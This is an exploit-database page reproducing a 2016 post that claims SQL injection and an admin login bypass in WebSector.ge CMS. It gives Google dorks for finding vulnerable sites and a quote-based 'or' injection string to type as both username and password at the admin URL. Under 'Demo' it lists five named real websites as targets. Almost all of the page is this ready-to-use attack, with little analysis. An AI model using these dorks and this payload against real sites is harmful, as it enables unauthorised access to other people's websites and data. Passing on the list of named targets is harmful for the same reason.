Advertisement






WebSector.ge CMS SQL injection & Admin Page Bypass

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 Varies High
Author Risk Exploitation Type Date
Unknown High Remote 2016-12-06
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016120026

Below is a copy:

WebSector.ge CMS SQL injection & Admin Page Bypass|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------|
|[+] Exploit Title: SQL injection & Admin Page Bypass
|[+]
|[+] Exploit Author : Azerbaycanli Hacker #By.SaMiR
|[+]
|[+] Vendor Homepage: http://websector.ge/
|[+]
|[+] Google Dork:intext:"websector.ge" inurl:php?id=
|[+] Google Dork:  WebSector.ge- 
|[+]
|[+] Tested on: Windows 7
|[+]
|[+] Date: 06/12/2016
|[+]
|--------------------------------------------------------------|
|[+] Exploit :
|[+]
|[+] Username: '=' 'or'
|[+] Password: '=' 'or'
|[+]
|[+] Admin Url :-
|[+]
|[+] http://Site.ge/admin/
|[+]
|--------------------------------------------------------------|
|[+] Demo:-
|[+]
|[+]http://www.turugeorgia.com/index.php?page=tour_single&id=34
|[+]http://ertobaplus.ge/index.php?page=product&catid=35
|[+]http://orbita.ge/index.php?page=pages&id=6
|[+]http://www.vitamin.ge/index.php?page=projects_single&id=95
|[+]http://www.hauck-georgien.com/index.php?page=products&cat=4

|--------------------------------------------------------------|
|[+] Thanks: CXSECURITY.COM Team's Members
|[+] Azrbaycan Gcl Dvltdir v Onun Gcl Ordusu Var!
|[+] Url : http://pagebin.com/G2V7JVOW
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum